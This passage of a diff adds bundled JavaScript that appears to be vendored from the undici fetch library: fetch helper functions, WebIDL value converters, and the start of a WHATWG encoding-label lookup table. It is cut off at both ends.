rej + const promise = new Promise((resolve, reject) => { + res = resolve + rej = reject + }) + + return { promise, resolve: res, reject: rej } +} + +function isAborted (fetchParams) { + return fetchParams.controller.state === 'aborted' +} + +function isCancelled (fetchParams) { + return fetchParams.controller.state === 'aborted' || + fetchParams.controller.state === 'terminated' +} + +const normalizeMethodRecord = { + delete: 'DELETE', + DELETE: 'DELETE', + get: 'GET', + GET: 'GET', + head: 'HEAD', + HEAD: 'HEAD', + options: 'OPTIONS', + OPTIONS: 'OPTIONS', + post: 'POST', + POST: 'POST', + put: 'PUT', + PUT: 'PUT' +} + +// Note: object prototypes should not be able to be referenced. e.g. `Object#hasOwnProperty`. +Object.setPrototypeOf(normalizeMethodRecord, null) + +/** + * @see https://fetch.spec.whatwg.org/#concept-method-normalize + * @param {string} method + */ +function normalizeMethod (method) { + return normalizeMethodRecord[method.toLowerCase()] ?? method +} + +// https://infra.spec.whatwg.org/#serialize-a-javascript-value-to-a-json-string +function serializeJavascriptValueToJSONString (value) { + // 1. Let result be ? Call(%JSON.stringify%, undefined, « value »). + const result = JSON.stringify(value) + + // 2. If result is undefined, then throw a TypeError. + if (result === undefined) { + throw new TypeError('Value is not JSON serializable') + } + + // 3. Assert: result is a string. + assert(typeof result === 'string') + + // 4. Return result. + return result +} + +// https://tc39.es/ecma262/#sec-%25iteratorprototype%25-object +const esIteratorPrototype = Object.getPrototypeOf(Object.getPrototypeOf([][Symbol.iterator]())) + +/** + * @see https://webidl.spec.whatwg.org/#dfn-iterator-prototype-object + * @param {() => unknown[]} iterator + * @param {string} name name of the instance + * @param {'key'|'value'|'key+value'} kind + */ +function makeIterator (iterator, name, kind) { + const object = { + index: 0, + kind, + target: iterator + } + + const i = { + next () { + // 1. Let interface be the interface for which the iterator prototype object exists. + + // 2. Let thisValue be the this value. + + // 3. Let object be ? ToObject(thisValue). + + // 4. If object is a platform object, then perform a security + // check, passing: + + // 5. If object is not a default iterator object for interface, + // then throw a TypeError. + if (Object.getPrototypeOf(this) !== i) { + throw new TypeError( + `'next' called on an object that does not implement interface ${name} Iterator.` + ) + } + + // 6. Let index be object’s index. + // 7. Let kind be object’s kind. + // 8. Let values be object’s target's value pairs to iterate over. + const { index, kind, target } = object + const values = target() + + // 9. Let len be the length of values. + const len = values.length + + // 10. If index is greater than or equal to len, then return + // CreateIterResultObject(undefined, true). + if (index >= len) { + return { value: undefined, done: true } + } + + // 11. Let pair be the entry in values at index index. + const pair = values[index] + + // 12. Set object’s index to index + 1. + object.index = index + 1 + + // 13. Return the iterator result for pair and kind. + return iteratorResult(pair, kind) + }, + // The class string of an iterator prototype object for a given interface is the + // result of concatenating the identifier of the interface and the string " Iterator". + [Symbol.toStringTag]: `${name} Iterator` + } + + // The [[Prototype]] internal slot of an iterator prototype object must be %IteratorPrototype%. + Object.setPrototypeOf(i, esIteratorPrototype) + // esIteratorPrototype needs to be the prototype of i + // which is the prototype of an empty object. Yes, it's confusing. + return Object.setPrototypeOf({}, i) +} + +// https://webidl.spec.whatwg.org/#iterator-result +function iteratorResult (pair, kind) { + let result + + // 1. Let result be a value determined by the value of kind: + switch (kind) { + case 'key': { + // 1. Let idlKey be pair’s key. + // 2. Let key be the result of converting idlKey to an + // ECMAScript value. + // 3. result is key. + result = pair[0] + break + } + case 'value': { + // 1. Let idlValue be pair’s value. + // 2. Let value be the result of converting idlValue to + // an ECMAScript value. + // 3. result is value. + result = pair[1] + break + } + case 'key+value': { + // 1. Let idlKey be pair’s key. + // 2. Let idlValue be pair’s value. + // 3. Let key be the result of converting idlKey to an + // ECMAScript value. + // 4. Let value be the result of converting idlValue to + // an ECMAScript value. + // 5. Let array be ! ArrayCreate(2). + // 6. Call ! CreateDataProperty(array, "0", key). + // 7. Call ! CreateDataProperty(array, "1", value). + // 8. result is array. + result = pair + break + } + } + + // 2. Return CreateIterResultObject(result, false). + return { value: result, done: false } +} + +/** + * @see https://fetch.spec.whatwg.org/#body-fully-read + */ +async function fullyReadBody (body, processBody, processBodyError) { + // 1. If taskDestination is null, then set taskDestination to + // the result of starting a new parallel queue. + + // 2. Let successSteps given a byte sequence bytes be to queue a + // fetch task to run processBody given bytes, with taskDestination. + const successSteps = processBody + + // 3. Let errorSteps be to queue a fetch task to run processBodyError, + // with taskDestination. + const errorSteps = processBodyError + + // 4. Let reader be the result of getting a reader for body’s stream. + // If that threw an exception, then run errorSteps with that + // exception and return. + let reader + + try { + reader = body.stream.getReader() + } catch (e) { + errorSteps(e) + return + } + + // 5. Read all bytes from reader, given successSteps and errorSteps. + try { + const result = await readAllBytes(reader) + successSteps(result) + } catch (e) { + errorSteps(e) + } +} + +/** @type {ReadableStream} */ +let ReadableStream = globalThis.ReadableStream + +function isReadableStreamLike (stream) { + if (!ReadableStream) { + ReadableStream = (__nccwpck_require__(5356).ReadableStream) + } + + return stream instanceof ReadableStream || ( + stream[Symbol.toStringTag] === 'ReadableStream' && + typeof stream.tee === 'function' + ) +} + +const MAXIMUM_ARGUMENT_LENGTH = 65535 + +/** + * @see https://infra.spec.whatwg.org/#isomorphic-decode + * @param {number[]|Uint8Array} input + */ +function isomorphicDecode (input) { + // 1. To isomorphic decode a byte sequence input, return a string whose code point + // length is equal to input’s length and whose code points have the same values + // as the values of input’s bytes, in the same order. + + if (input.length < MAXIMUM_ARGUMENT_LENGTH) { + return String.fromCharCode(...input) + } + + return input.reduce((previous, current) => previous + String.fromCharCode(current), '') +} + +/** + * @param {ReadableStreamController} controller + */ +function readableStreamClose (controller) { + try { + controller.close() + } catch (err) { + // TODO: add comment explaining why this error occurs. + if (!err.message.includes('Controller is already closed')) { + throw err + } + } +} + +/** + * @see https://infra.spec.whatwg.org/#isomorphic-encode + * @param {string} input + */ +function isomorphicEncode (input) { + // 1. Assert: input contains no code points greater than U+00FF. + for (let i = 0; i < input.length; i++) { + assert(input.charCodeAt(i) <= 0xFF) + } + + // 2. Return a byte sequence whose length is equal to input’s code + // point length and whose bytes have the same values as the + // values of input’s code points, in the same order + return input +} + +/** + * @see https://streams.spec.whatwg.org/#readablestreamdefaultreader-read-all-bytes + * @see https://streams.spec.whatwg.org/#read-loop + * @param {ReadableStreamDefaultReader} reader + */ +async function readAllBytes (reader) { + const bytes = [] + let byteLength = 0 + + while (true) { + const { done, value: chunk } = await reader.read() + + if (done) { + // 1. Call successSteps with bytes. + return Buffer.concat(bytes, byteLength) + } + + // 1. If chunk is not a Uint8Array object, call failureSteps + // with a TypeError and abort these steps. + if (!isUint8Array(chunk)) { + throw new TypeError('Received non-Uint8Array chunk') + } + + // 2. Append the bytes represented by chunk to bytes. + bytes.push(chunk) + byteLength += chunk.length + + // 3. Read-loop given reader, bytes, successSteps, and failureSteps. + } +} + +/** + * @see https://fetch.spec.whatwg.org/#is-local + * @param {URL} url + */ +function urlIsLocal (url) { + assert('protocol' in url) // ensure it's a url object + + const protocol = url.protocol + + return protocol === 'about:' || protocol === 'blob:' || protocol === 'data:' +} + +/** + * @param {string|URL} url + */ +function urlHasHttpsScheme (url) { + if (typeof url === 'string') { + return url.startsWith('https:') + } + + return url.protocol === 'https:' +} + +/** + * @see https://fetch.spec.whatwg.org/#http-scheme + * @param {URL} url + */ +function urlIsHttpHttpsScheme (url) { + assert('protocol' in url) // ensure it's a url object + + const protocol = url.protocol + + return protocol === 'http:' || protocol === 'https:' +} + +/** + * Fetch supports node >= 16.8.0, but Object.hasOwn was added in v16.9.0. + */ +const hasOwn = Object.hasOwn || ((dict, key) => Object.prototype.hasOwnProperty.call(dict, key)) + +module.exports = { + isAborted, + isCancelled, + createDeferredPromise, + ReadableStreamFrom, + toUSVString, + tryUpgradeRequestToAPotentiallyTrustworthyURL, + coarsenedSharedCurrentTime, + determineRequestsReferrer, + makePolicyContainer, + clonePolicyContainer, + appendFetchMetadata, + appendRequestOriginHeader, + TAOCheck, + corsCheck, + crossOriginResourcePolicyCheck, + createOpaqueTimingInfo, + setRequestReferrerPolicyOnRedirect, + isValidHTTPToken, + requestBadPort, + requestCurrentURL, + responseURL, + responseLocationURL, + isBlobLike, + isURLPotentiallyTrustworthy, + isValidReasonPhrase, + sameOrigin, + normalizeMethod, + serializeJavascriptValueToJSONString, + makeIterator, + isValidHeaderName, + isValidHeaderValue, + hasOwn, + isErrorLike, + fullyReadBody, + bytesMatch, + isReadableStreamLike, + readableStreamClose, + isomorphicEncode, + isomorphicDecode, + urlIsLocal, + urlHasHttpsScheme, + urlIsHttpHttpsScheme, + readAllBytes, + normalizeMethodRecord +} + + +/***/ }), + +/***/ 1744: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { types } = __nccwpck_require__(3837) +const { hasOwn, toUSVString } = __nccwpck_require__(2538) + +/** @type {import('../../types/webidl').Webidl} */ +const webidl = {} +webidl.converters = {} +webidl.util = {} +webidl.errors = {} + +webidl.errors.exception = function (message) { + return new TypeError(`${message.header}: ${message.message}`) +} + +webidl.errors.conversionFailed = function (context) { + const plural = context.types.length === 1 ? '' : ' one of' + const message = + `${context.argument} could not be converted to` + + `${plural}: ${context.types.join(', ')}.` + + return webidl.errors.exception({ + header: context.prefix, + message + }) +} + +webidl.errors.invalidArgument = function (context) { + return webidl.errors.exception({ + header: context.prefix, + message: `"${context.value}" is an invalid ${context.type}.` + }) +} + +// https://webidl.spec.whatwg.org/#implements +webidl.brandCheck = function (V, I, opts = undefined) { + if (opts?.strict !== false && !(V instanceof I)) { + throw new TypeError('Illegal invocation') + } else { + return V?.[Symbol.toStringTag] === I.prototype[Symbol.toStringTag] + } +} + +webidl.argumentLengthCheck = function ({ length }, min, ctx) { + if (length < min) { + throw webidl.errors.exception({ + message: `${min} argument${min !== 1 ? 's' : ''} required, ` + + `but${length ? ' only' : ''} ${length} found.`, + ...ctx + }) + } +} + +webidl.illegalConstructor = function () { + throw webidl.errors.exception({ + header: 'TypeError', + message: 'Illegal constructor' + }) +} + +// https://tc39.es/ecma262/#sec-ecmascript-data-types-and-values +webidl.util.Type = function (V) { + switch (typeof V) { + case 'undefined': return 'Undefined' + case 'boolean': return 'Boolean' + case 'string': return 'String' + case 'symbol': return 'Symbol' + case 'number': return 'Number' + case 'bigint': return 'BigInt' + case 'function': + case 'object': { + if (V === null) { + return 'Null' + } + + return 'Object' + } + } +} + +// https://webidl.spec.whatwg.org/#abstract-opdef-converttoint +webidl.util.ConvertToInt = function (V, bitLength, signedness, opts = {}) { + let upperBound + let lowerBound + + // 1. If bitLength is 64, then: + if (bitLength === 64) { + // 1. Let upperBound be 2^53 − 1. + upperBound = Math.pow(2, 53) - 1 + + // 2. If signedness is "unsigned", then let lowerBound be 0. + if (signedness === 'unsigned') { + lowerBound = 0 + } else { + // 3. Otherwise let lowerBound be −2^53 + 1. + lowerBound = Math.pow(-2, 53) + 1 + } + } else if (signedness === 'unsigned') { + // 2. Otherwise, if signedness is "unsigned", then: + + // 1. Let lowerBound be 0. + lowerBound = 0 + + // 2. Let upperBound be 2^bitLength − 1. + upperBound = Math.pow(2, bitLength) - 1 + } else { + // 3. Otherwise: + + // 1. Let lowerBound be -2^bitLength − 1. + lowerBound = Math.pow(-2, bitLength) - 1 + + // 2. Let upperBound be 2^bitLength − 1 − 1. + upperBound = Math.pow(2, bitLength - 1) - 1 + } + + // 4. Let x be ? ToNumber(V). + let x = Number(V) + + // 5. If x is −0, then set x to +0. + if (x === 0) { + x = 0 + } + + // 6. If the conversion is to an IDL type associated + // with the [EnforceRange] extended attribute, then: + if (opts.enforceRange === true) { + // 1. If x is NaN, +∞, or −∞, then throw a TypeError. + if ( + Number.isNaN(x) || + x === Number.POSITIVE_INFINITY || + x === Number.NEGATIVE_INFINITY + ) { + throw webidl.errors.exception({ + header: 'Integer conversion', + message: `Could not convert ${V} to an integer.` + }) + } + + // 2. Set x to IntegerPart(x). + x = webidl.util.IntegerPart(x) + + // 3. If x < lowerBound or x > upperBound, then + // throw a TypeError. + if (x < lowerBound || x > upperBound) { + throw webidl.errors.exception({ + header: 'Integer conversion', + message: `Value must be between ${lowerBound}-${upperBound}, got ${x}.` + }) + } + + // 4. Return x. + return x + } + + // 7. If x is not NaN and the conversion is to an IDL + // type associated with the [Clamp] extended + // attribute, then: + if (!Number.isNaN(x) && opts.clamp === true) { + // 1. Set x to min(max(x, lowerBound), upperBound). + x = Math.min(Math.max(x, lowerBound), upperBound) + + // 2. Round x to the nearest integer, choosing the + // even integer if it lies halfway between two, + // and choosing +0 rather than −0. + if (Math.floor(x) % 2 === 0) { + x = Math.floor(x) + } else { + x = Math.ceil(x) + } + + // 3. Return x. + return x + } + + // 8. If x is NaN, +0, +∞, or −∞, then return +0. + if ( + Number.isNaN(x) || + (x === 0 && Object.is(0, x)) || + x === Number.POSITIVE_INFINITY || + x === Number.NEGATIVE_INFINITY + ) { + return 0 + } + + // 9. Set x to IntegerPart(x). + x = webidl.util.IntegerPart(x) + + // 10. Set x to x modulo 2^bitLength. + x = x % Math.pow(2, bitLength) + + // 11. If signedness is "signed" and x ≥ 2^bitLength − 1, + // then return x − 2^bitLength. + if (signedness === 'signed' && x >= Math.pow(2, bitLength) - 1) { + return x - Math.pow(2, bitLength) + } + + // 12. Otherwise, return x. + return x +} + +// https://webidl.spec.whatwg.org/#abstract-opdef-integerpart +webidl.util.IntegerPart = function (n) { + // 1. Let r be floor(abs(n)). + const r = Math.floor(Math.abs(n)) + + // 2. If n < 0, then return -1 × r. + if (n < 0) { + return -1 * r + } + + // 3. Otherwise, return r. + return r +} + +// https://webidl.spec.whatwg.org/#es-sequence +webidl.sequenceConverter = function (converter) { + return (V) => { + // 1. If Type(V) is not Object, throw a TypeError. + if (webidl.util.Type(V) !== 'Object') { + throw webidl.errors.exception({ + header: 'Sequence', + message: `Value of type ${webidl.util.Type(V)} is not an Object.` + }) + } + + // 2. Let method be ? GetMethod(V, @@iterator). + /** @type {Generator} */ + const method = V?.[Symbol.iterator]?.() + const seq = [] + + // 3. If method is undefined, throw a TypeError. + if ( + method === undefined || + typeof method.next !== 'function' + ) { + throw webidl.errors.exception({ + header: 'Sequence', + message: 'Object is not an iterator.' + }) + } + + // https://webidl.spec.whatwg.org/#create-sequence-from-iterable + while (true) { + const { done, value } = method.next() + + if (done) { + break + } + + seq.push(converter(value)) + } + + return seq + } +} + +// https://webidl.spec.whatwg.org/#es-to-record +webidl.recordConverter = function (keyConverter, valueConverter) { + return (O) => { + // 1. If Type(O) is not Object, throw a TypeError. + if (webidl.util.Type(O) !== 'Object') { + throw webidl.errors.exception({ + header: 'Record', + message: `Value of type ${webidl.util.Type(O)} is not an Object.` + }) + } + + // 2. Let result be a new empty instance of record. + const result = {} + + if (!types.isProxy(O)) { + // Object.keys only returns enumerable properties + const keys = Object.keys(O) + + for (const key of keys) { + // 1. Let typedKey be key converted to an IDL value of type K. + const typedKey = keyConverter(key) + + // 2. Let value be ? Get(O, key). + // 3. Let typedValue be value converted to an IDL value of type V. + const typedValue = valueConverter(O[key]) + + // 4. Set result[typedKey] to typedValue. + result[typedKey] = typedValue + } + + // 5. Return result. + return result + } + + // 3. Let keys be ? O.[[OwnPropertyKeys]](). + const keys = Reflect.ownKeys(O) + + // 4. For each key of keys. + for (const key of keys) { + // 1. Let desc be ? O.[[GetOwnProperty]](key). + const desc = Reflect.getOwnPropertyDescriptor(O, key) + + // 2. If desc is not undefined and desc.[[Enumerable]] is true: + if (desc?.enumerable) { + // 1. Let typedKey be key converted to an IDL value of type K. + const typedKey = keyConverter(key) + + // 2. Let value be ? Get(O, key). + // 3. Let typedValue be value converted to an IDL value of type V. + const typedValue = valueConverter(O[key]) + + // 4. Set result[typedKey] to typedValue. + result[typedKey] = typedValue + } + } + + // 5. Return result. + return result + } +} + +webidl.interfaceConverter = function (i) { + return (V, opts = {}) => { + if (opts.strict !== false && !(V instanceof i)) { + throw webidl.errors.exception({ + header: i.name, + message: `Expected ${V} to be an instance of ${i.name}.` + }) + } + + return V + } +} + +webidl.dictionaryConverter = function (converters) { + return (dictionary) => { + const type = webidl.util.Type(dictionary) + const dict = {} + + if (type === 'Null' || type === 'Undefined') { + return dict + } else if (type !== 'Object') { + throw webidl.errors.exception({ + header: 'Dictionary', + message: `Expected ${dictionary} to be one of: Null, Undefined, Object.` + }) + } + + for (const options of converters) { + const { key, defaultValue, required, converter } = options + + if (required === true) { + if (!hasOwn(dictionary, key)) { + throw webidl.errors.exception({ + header: 'Dictionary', + message: `Missing required key "${key}".` + }) + } + } + + let value = dictionary[key] + const hasDefault = hasOwn(options, 'defaultValue') + + // Only use defaultValue if value is undefined and + // a defaultValue options was provided. + if (hasDefault && value !== null) { + value = value ?? defaultValue + } + + // A key can be optional and have no default value. + // When this happens, do not perform a conversion, + // and do not assign the key a value. + if (required || hasDefault || value !== undefined) { + value = converter(value) + + if ( + options.allowedValues && + !options.allowedValues.includes(value) + ) { + throw webidl.errors.exception({ + header: 'Dictionary', + message: `${value} is not an accepted type. Expected one of ${options.allowedValues.join(', ')}.` + }) + } + + dict[key] = value + } + } + + return dict + } +} + +webidl.nullableConverter = function (converter) { + return (V) => { + if (V === null) { + return V + } + + return converter(V) + } +} + +// https://webidl.spec.whatwg.org/#es-DOMString +webidl.converters.DOMString = function (V, opts = {}) { + // 1. If V is null and the conversion is to an IDL type + // associated with the [LegacyNullToEmptyString] + // extended attribute, then return the DOMString value + // that represents the empty string. + if (V === null && opts.legacyNullToEmptyString) { + return '' + } + + // 2. Let x be ? ToString(V). + if (typeof V === 'symbol') { + throw new TypeError('Could not convert argument of type symbol to string.') + } + + // 3. Return the IDL DOMString value that represents the + // same sequence of code units as the one the + // ECMAScript String value x represents. + return String(V) +} + +// https://webidl.spec.whatwg.org/#es-ByteString +webidl.converters.ByteString = function (V) { + // 1. Let x be ? ToString(V). + // Note: DOMString converter perform ? ToString(V) + const x = webidl.converters.DOMString(V) + + // 2. If the value of any element of x is greater than + // 255, then throw a TypeError. + for (let index = 0; index < x.length; index++) { + if (x.charCodeAt(index) > 255) { + throw new TypeError( + 'Cannot convert argument to a ByteString because the character at ' + + `index ${index} has a value of ${x.charCodeAt(index)} which is greater than 255.` + ) + } + } + + // 3. Return an IDL ByteString value whose length is the + // length of x, and where the value of each element is + // the value of the corresponding element of x. + return x +} + +// https://webidl.spec.whatwg.org/#es-USVString +webidl.converters.USVString = toUSVString + +// https://webidl.spec.whatwg.org/#es-boolean +webidl.converters.boolean = function (V) { + // 1. Let x be the result of computing ToBoolean(V). + const x = Boolean(V) + + // 2. Return the IDL boolean value that is the one that represents + // the same truth value as the ECMAScript Boolean value x. + return x +} + +// https://webidl.spec.whatwg.org/#es-any +webidl.converters.any = function (V) { + return V +} + +// https://webidl.spec.whatwg.org/#es-long-long +webidl.converters['long long'] = function (V) { + // 1. Let x be ? ConvertToInt(V, 64, "signed"). + const x = webidl.util.ConvertToInt(V, 64, 'signed') + + // 2. Return the IDL long long value that represents + // the same numeric value as x. + return x +} + +// https://webidl.spec.whatwg.org/#es-unsigned-long-long +webidl.converters['unsigned long long'] = function (V) { + // 1. Let x be ? ConvertToInt(V, 64, "unsigned"). + const x = webidl.util.ConvertToInt(V, 64, 'unsigned') + + // 2. Return the IDL unsigned long long value that + // represents the same numeric value as x. + return x +} + +// https://webidl.spec.whatwg.org/#es-unsigned-long +webidl.converters['unsigned long'] = function (V) { + // 1. Let x be ? ConvertToInt(V, 32, "unsigned"). + const x = webidl.util.ConvertToInt(V, 32, 'unsigned') + + // 2. Return the IDL unsigned long value that + // represents the same numeric value as x. + return x +} + +// https://webidl.spec.whatwg.org/#es-unsigned-short +webidl.converters['unsigned short'] = function (V, opts) { + // 1. Let x be ? ConvertToInt(V, 16, "unsigned"). + const x = webidl.util.ConvertToInt(V, 16, 'unsigned', opts) + + // 2. Return the IDL unsigned short value that represents + // the same numeric value as x. + return x +} + +// https://webidl.spec.whatwg.org/#idl-ArrayBuffer +webidl.converters.ArrayBuffer = function (V, opts = {}) { + // 1. If Type(V) is not Object, or V does not have an + // [[ArrayBufferData]] internal slot, then throw a + // TypeError. + // see: https://tc39.es/ecma262/#sec-properties-of-the-arraybuffer-instances + // see: https://tc39.es/ecma262/#sec-properties-of-the-sharedarraybuffer-instances + if ( + webidl.util.Type(V) !== 'Object' || + !types.isAnyArrayBuffer(V) + ) { + throw webidl.errors.conversionFailed({ + prefix: `${V}`, + argument: `${V}`, + types: ['ArrayBuffer'] + }) + } + + // 2. If the conversion is not to an IDL type associated + // with the [AllowShared] extended attribute, and + // IsSharedArrayBuffer(V) is true, then throw a + // TypeError. + if (opts.allowShared === false && types.isSharedArrayBuffer(V)) { + throw webidl.errors.exception({ + header: 'ArrayBuffer', + message: 'SharedArrayBuffer is not allowed.' + }) + } + + // 3. If the conversion is not to an IDL type associated + // with the [AllowResizable] extended attribute, and + // IsResizableArrayBuffer(V) is true, then throw a + // TypeError. + // Note: resizable ArrayBuffers are currently a proposal. + + // 4. Return the IDL ArrayBuffer value that is a + // reference to the same object as V. + return V +} + +webidl.converters.TypedArray = function (V, T, opts = {}) { + // 1. Let T be the IDL type V is being converted to. + + // 2. If Type(V) is not Object, or V does not have a + // [[TypedArrayName]] internal slot with a value + // equal to T’s name, then throw a TypeError. + if ( + webidl.util.Type(V) !== 'Object' || + !types.isTypedArray(V) || + V.constructor.name !== T.name + ) { + throw webidl.errors.conversionFailed({ + prefix: `${T.name}`, + argument: `${V}`, + types: [T.name] + }) + } + + // 3. If the conversion is not to an IDL type associated + // with the [AllowShared] extended attribute, and + // IsSharedArrayBuffer(V.[[ViewedArrayBuffer]]) is + // true, then throw a TypeError. + if (opts.allowShared === false && types.isSharedArrayBuffer(V.buffer)) { + throw webidl.errors.exception({ + header: 'ArrayBuffer', + message: 'SharedArrayBuffer is not allowed.' + }) + } + + // 4. If the conversion is not to an IDL type associated + // with the [AllowResizable] extended attribute, and + // IsResizableArrayBuffer(V.[[ViewedArrayBuffer]]) is + // true, then throw a TypeError. + // Note: resizable array buffers are currently a proposal + + // 5. Return the IDL value of type T that is a reference + // to the same object as V. + return V +} + +webidl.converters.DataView = function (V, opts = {}) { + // 1. If Type(V) is not Object, or V does not have a + // [[DataView]] internal slot, then throw a TypeError. + if (webidl.util.Type(V) !== 'Object' || !types.isDataView(V)) { + throw webidl.errors.exception({ + header: 'DataView', + message: 'Object is not a DataView.' + }) + } + + // 2. If the conversion is not to an IDL type associated + // with the [AllowShared] extended attribute, and + // IsSharedArrayBuffer(V.[[ViewedArrayBuffer]]) is true, + // then throw a TypeError. + if (opts.allowShared === false && types.isSharedArrayBuffer(V.buffer)) { + throw webidl.errors.exception({ + header: 'ArrayBuffer', + message: 'SharedArrayBuffer is not allowed.' + }) + } + + // 3. If the conversion is not to an IDL type associated + // with the [AllowResizable] extended attribute, and + // IsResizableArrayBuffer(V.[[ViewedArrayBuffer]]) is + // true, then throw a TypeError. + // Note: resizable ArrayBuffers are currently a proposal + + // 4. Return the IDL DataView value that is a reference + // to the same object as V. + return V +} + +// https://webidl.spec.whatwg.org/#BufferSource +webidl.converters.BufferSource = function (V, opts = {}) { + if (types.isAnyArrayBuffer(V)) { + return webidl.converters.ArrayBuffer(V, opts) + } + + if (types.isTypedArray(V)) { + return webidl.converters.TypedArray(V, V.constructor) + } + + if (types.isDataView(V)) { + return webidl.converters.DataView(V, opts) + } + + throw new TypeError(`Could not convert ${V} to a BufferSource.`) +} + +webidl.converters['sequence'] = webidl.sequenceConverter( + webidl.converters.ByteString +) + +webidl.converters['sequence>'] = webidl.sequenceConverter( + webidl.converters['sequence'] +) + +webidl.converters['record'] = webidl.recordConverter( + webidl.converters.ByteString, + webidl.converters.ByteString +) + +module.exports = { + webidl +} + + +/***/ }), + +/***/ 4854: +/***/ ((module) => { + +"use strict"; + + +/** + * @see https://encoding.spec.whatwg.org/#concept-encoding-get + * @param {string|undefined} label + */ +function getEncoding (label) { + if (!label) { + return 'failure' + } + + // 1. Remove any leading and trailing ASCII whitespace from label. + // 2. If label is an ASCII case-insensitive match for any of the + // labels listed in the table below, then return the + // corresponding encoding; otherwise return failure. + switch (label.trim().toLowerCase()) { + case 'unicode-1-1-utf-8': + case 'unicode11utf8': + case 'unicode20utf8': + case 'utf-8': + case 'utf8': + case 'x-unicode20utf8': + return 'UTF-8' + case '866': + case 'cp866': + case 'csibm866': + case 'ibm866': + return 'IBM866' + case 'csisolatin2': + case 'iso-8859-2': + case 'iso-ir-101': + case 'iso8859-2': + case 'iso88592': + case 'iso_8859-2': + case 'iso_8859-2:1987': + case 'l2': + case 'latin2': + return 'ISO-8859-2' + case 'csisolatin3': + case 'iso-8859-3': + case 'iso-ir-109': + case 'iso8859-3': + case 'iso88593': + case 'iso_8859-3': + case 'iso_8859-3:1988': + case 'l3': + case 'latin3': + return 'ISO-8859-3' + case 'csisolatin4': + case 'iso-8859-4': + case 'iso-ir-110': + case 'iso8859-4': + case 'iso88594': + case 'iso_8859-4': + case 'iso_8859-4:1988': + case 'l4': + case 'latin4': + return 'ISO-8859-4' + case 'csisolatincyrillic': + case 'cyrillic': + case 'iso-8859-5': + case 'iso-ir-144': + case 'iso8859-5': + case 'iso88595': + case 'iso_8859-5': + case 'iso_8859-5:1988': + return 'ISO-8859-5' + case 'arabic': + case 'asmo-708': + case 'csiso88596e': + case 'csiso88596i': + case 'csisolatinarabic': + case 'ecma-114': + case 'iso-8859-6': + case 'iso-8859-6-e': + case 'iso-8859-6-i': + case 'iso-ir-127': + case 'iso8859-6': + case 'iso88596': + case 'iso_8859-6': + case 'iso_8859-6:1987': + return 'ISO-8859-6' + case 'csisolatingreek': + case 'ecma-118': + case 'elot_928': + case 'greek': + case 'greek8': + case 'iso-8859-7': + case 'iso-ir-126': + case 'iso8859-7': + case 'iso88597': + case 'iso_8859-7': + case 'iso_8859-7:1987': + case 'sun_eu_greek': + return 'ISO-8859-7' + case 'csiso88598e': + case 'csisolatinhebrew': + case 'hebrew': + case 'iso-8859-8': + case 'iso-8859-8-e': + case 'iso-ir-138': + case 'iso8859-8': + case 'iso88598': + case 'iso_8859-8': + case 'iso_8859-8:1988': + case 'visual': + return 'ISO-8859-8' + case 'csiso88598i': + case 'iso-8859-8-i': + case 'logical': + return 'ISO-8859-8-I' + case 'csisolatin6': + case 'iso-8859-10': + case 'iso-ir-157': + case 'iso8859-10': + case 'iso885910': + case 'l6': + case 'latin6': + return 'ISO-8859-10' + case 'iso-8859-13': + case 'iso8859-13': + case 'iso885913': + return 'ISO-8859-13' + case 'iso-8859-14': + case 'iso8859-14': + case 'iso885914': + return 'ISO-8859-14' + case 'csisolatin9': + case 'iso-8859-15': + case 'iso8859-15': + case 'iso885915': + case 'iso_8859-15': + case 'l9': + return 'ISO-8859-15' + case 'iso-8859-16': + return 'ISO-8859-16' + case 'cskoi8r': + case 'koi': + case 'koi8': + case 'koi8-r': + case 'koi8_r': + return 'KOI8-R' + case 'koi8-ru': + case 'koi8-u': + return 'KOI8-U' + case 'csmacintosh': + case 'mac': + case 'macintosh': + case 'x-mac-roman': + return 'macintosh' + case 'iso-8859-11': + case 'iso8859-11': + case 'iso885911': + case 'tis-620': + case 'windows-874': + return 'windows-874' + case 'cp1250': + case 'windows-1250': + case 'x-cp1250': + return 'windows-1250' + case 'cp1251': + case 'windows-1251': + case 'x-cp1251': + return 'windows-1251' + case 'ansi_x3.4-1968': + case 'ascii': + case 'cp1252': + case 'cp819': + case 'csisolatin1': + case 'ibm819': + case 'iso-8859-1': + case 'iso-ir-100': + case 'iso8859-1': + case 'iso88591': + case 'iso_8859-1': + case 'iso_8859-1:1987': + case 'l1': + case 'latin1': + case 'us-ascii': + case 'windows-1252': + case 'x-cp1252': + return 'windows-1252' + case 'cp1253': + case 'windows-1253': + case 'x-cp1253': + return 'windows-1253' + case 'cp1254': + case 'csisolatin5': + case 'iso-8859-9': + case 'iso-ir-148': + case 'iso8859-9': + case 'iso88599': + case 'iso_8859-9': + case 'iso_8859-9:1989': + case 'l5': + case 'latin5': + case 'windows-1254': + case 'x-cp1254': + return 'windows-1254' + case 'cp1255': + case 'windows-1255': + case 'x-cp1255': + return 'windows-1255' + case 'cp1256': + case 'windows-1256': + case 'x-cp1256': + return 'windows-1256' + case 'cp1257': + case 'windows-1257': + case 'x-cp1257': + return 'windows-1257' + case 'cp1258': + case 'windows-1258': + case 'x-cp1258': + return 'windows-1258' + case 'x-mac-cyrillic': + case 'x-mac-ukrainian': + return 'x-mac-cyrillic' + case 'chinese': + case 'csgb2312': + case 'csiso58gb231280': + case 'gb2312': + case 'gb_2312': + case 'gb_2312-80': + case 'gbk': + case 'iso-ir-58': + case 'x-gbk': + return 'GBK' + case 'gb18030': + return 'gb18030' + case 'big5': + case 'big5-hkscs': + case 'cn-big5': + case 'csbig5': + case 'x-x-big5': + return 'Big5' + case 'cseucpkdfmtjapanese': + case 'euc-jp': + case 'x-euc-jp': + return 'EUC-JP' + case 'csiso2022jp': + case 'iso-2022-jp': + return 'ISO-2022-JP' + case 'csshiftjis': + case 'ms932': + case 'ms_kanji': + case 'shift-jis': + case 'shift_jis': + case 'sjis': + case 'windows-31j': + case 'x-sjis': + return 'Shift_JIS' + case 'cseuckr': + case 'csksc56011987': + case 'euc-kr': + case 'iso-ir-149': + case 'korean': + case 'ks_c_5601-1987': + case 'ks_c_5601-1989': + case 'ksc5601': + case 'ksc_5601': + case 'windows-949': + return 'EUC-KR' + case 'csiso2022kr': + case 'hz-gb-2312': + case 'iso-2022-cn': + case 'iso-2022-cn-ext': + case 'iso-2022-kr': + case 'replacement': + return 'replacement' + case 'unicodefffe': + case 'utf-16be': + return 'UTF-16BE' + case 'csunicode': + case 'iso-10646-ucs-2': + case 'ucs-2': + case 'unicode': + case 'unicodefeff': + case 'utf-16': + case 'utf-16le': + return 